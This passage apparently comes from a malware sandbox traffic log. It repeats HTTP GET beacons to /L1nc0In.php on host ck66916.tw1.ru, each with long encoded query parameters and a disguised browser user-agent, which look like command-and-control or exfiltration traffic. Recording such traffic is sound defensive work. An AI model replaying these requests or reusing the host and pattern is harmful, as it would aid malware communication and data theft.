YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lW